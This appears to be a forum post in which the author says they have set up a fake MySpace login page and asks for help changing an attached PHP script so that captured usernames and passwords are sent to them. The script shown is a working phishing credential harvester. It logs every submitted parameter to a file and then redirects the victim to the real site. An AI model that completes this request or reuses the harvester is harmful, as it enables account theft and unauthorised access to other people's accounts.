Please, I need help hacking some people's myspaces. Before any of you guys are like, "That is not possible", or "There is no use in it", I tell you this. I really don't care. I have created a fake myspace login page. I already uploaded the html file and php file to it, so everything is ready, except one thing. I need to be able to recieve the username and pass through my email or any other source. Please tell me how to edit this php file so that I can direct the information to myself. These are the contents of the php file...

<?php
header("Location: {the name of the myspace site here}");
$handle = fopen("out.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>